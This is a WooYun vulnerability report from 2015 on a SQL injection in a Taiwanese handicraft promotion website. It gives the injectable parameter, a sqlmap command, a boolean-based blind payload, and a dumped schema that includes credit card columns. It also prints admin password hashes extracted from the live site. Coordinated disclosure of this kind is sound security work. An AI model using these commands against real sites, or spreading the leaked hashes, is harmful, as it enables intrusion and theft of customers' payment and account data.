漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0157044
漏洞标题:台湾手工推广Sql漏洞可获取密码等(臺灣地區)
相关厂商:www.handicraft.org.tw
漏洞作者: 卖女孩的小火柴
提交时间:2015-12-01 11:50
修复时间:2016-01-16 23:40
公开时间:2016-01-16 23:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开
简要描述:
rt
详细说明:
注入点:**.**.**.**/art_description.php?newsdesk_id=41
code:sqlmap.py -u "**.**.**.**/art_description.php?newsdesk_id=41
" -p "newsdesk_id"
漏洞证明:
Parameter: newsdesk_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newsdesk_id=41) AND 1577=1577 AND (2564=2564
Database: vhost5354
Table: orders
[8 columns]
+-------------------------+-------------+
| Column | Type |
+-------------------------+-------------+
| categories_id | numeric |
| cc_expires | numeric |
| cc_number | non-numeric |
| cc_owner | non-numeric |
| cc_type | non-numeric |
| customers_email_address | non-numeric |
| language_id | numeric |
| payment_method | non-numeric |
+-------------------------+-------------+
Database: vhost5354
Table: admin
[2 columns]
+----------------+-------------+
| Column | Type |
+----------------+-------------+
| admin_id | numeric |
| admin_password | non-numeric |
+----------------+-------------+
fetching entries for table 'admin' in database 'vhost5354'
fetching number of entries for table 'admin' in database 'v
resumed: 10
resumed: 1
resumed: 98eb0bb8ac72bbc88767acbfce8a37fb:b3
resumed: 7
resumed: fb13df9dc8eb5470d3da4239901b7d65:7a
resumed: 17
resumed: 26583eb46555dc89dce670a1d5978f4b:9b
resumed: 19
resumed: e697b5d7fa0fe239399d5060894cde6d:3d
resumed: 26
resumed: 6744feda08fbf024c4dc5b3d602b533d:74
等等
修复方案:
.....
版权声明:转载请注明来源 卖女孩的小火柴@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2015-12-02 23:38
厂商回复:
感謝通報
最新状态:
暂无